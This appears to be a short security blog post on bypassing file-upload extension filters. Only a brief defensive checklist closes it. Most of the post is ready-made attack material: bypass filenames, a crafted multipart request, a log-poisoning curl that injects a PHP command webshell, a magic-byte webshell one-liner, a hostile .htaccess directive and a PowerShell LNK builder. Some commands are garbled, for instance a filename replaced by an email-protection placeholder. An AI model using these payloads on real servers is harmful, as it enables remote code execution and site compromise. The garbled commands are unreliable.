Listen to this Post
Many web applications restrict file uploads by allowing only certain extensions (e.g., .jpg, .png). However, attackers can bypass these restrictions using various techniques, leading to severe security risks like Remote Code Execution (RCE) or webshell deployment.
Common Techniques to Bypass Extension Filters:
✅ Double Extensions (`shell.php.png`)
✅ Case Variation (`shell.Php`, `shell.pHp`)
✅ Special Character Injection (`shell.php%00.png`, `shell.php?.png`)
✅ Path Tricks (`shell.php.\png`, `shell.php./png`)
✅ No Extension Upload (`shell`)
Why Does This Matter?
If a server misinterprets the file extension, an attacker can execute arbitrary code, compromising the entire system.
You Should Know:
1. Testing File Upload Vulnerabilities
Use Burp Suite or OWASP ZAP to intercept and modify upload requests:
[http]
POST /upload.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=-WebKitFormBoundary
WebKitFormBoundary
Content-Disposition: form-data; name=”file”; filename=”shell.php%00.jpg”
Content-Type: application/x-php
[/http]
### **2. Bypassing MIME-Type Checks**
Modify the `Content-Type` header to fake an image:
Content-Type: image/jpeg
### **3. Using Null Byte Injection**
Exploit improper filename parsing:
curl -F "[email protected]%00.jpg" http://example.com/upload
### **4. Case Evasion (Linux/Windows)**
Linux is case-sensitive, while Windows is not:
– `shell.PHP` (may bypass case-sensitive filters)
– `shell.php5` (if `.php5` is allowed)
### **5. Alternative Extensions for Execution**
Some servers execute uncommon extensions:
.phtml,.phar,.php7, `.php3`
### **6. Zip File Upload & Extraction Bypass**
Upload a ZIP containing a malicious `.php` file:
zip shell.zip shell.php
If the server extracts files without validation, the PHP file may execute.
### **7. .htaccess Override (Apache)**
Upload a malicious `.htaccess` to execute scripts as PHP:
AddType application/x-httpd-php .jpg
### **8. Log Poisoning via File Upload**
If logs are stored in a web-accessible directory, inject PHP into logs:
curl -H "User-Agent: <?php system($_GET['cmd']); ?>" http://example.com
### **9. Windows Shortcut Exploit (LNK Files)**
Upload a malicious `.lnk` file to execute commands:
$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut("evil.lnk")
$shortcut.TargetPath = "cmd.exe"
$shortcut.Arguments = "/c calc.exe"
$shortcut.Save()
### **10. Defense Bypass with Magic Bytes**
Add image magic bytes to a PHP file:
echo -e "\xFF\xD8\xFF\xE0<?php system($_GET['cmd']); ?>" > shell.php.jpg
## **What Undercode Say:**
File upload vulnerabilities remain a critical attack vector due to improper validation. Developers must:
– Validate both extension and MIME type
– Use allowlists instead of denylists
– Store uploads outside the web root
– Scan files for malicious content
### **Expected Output:**
A secure file upload system that prevents unauthorized script execution while allowing legitimate file storage.
**Related URLs:**
References:
Reported By: Amitkumar711 Bugbounty – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
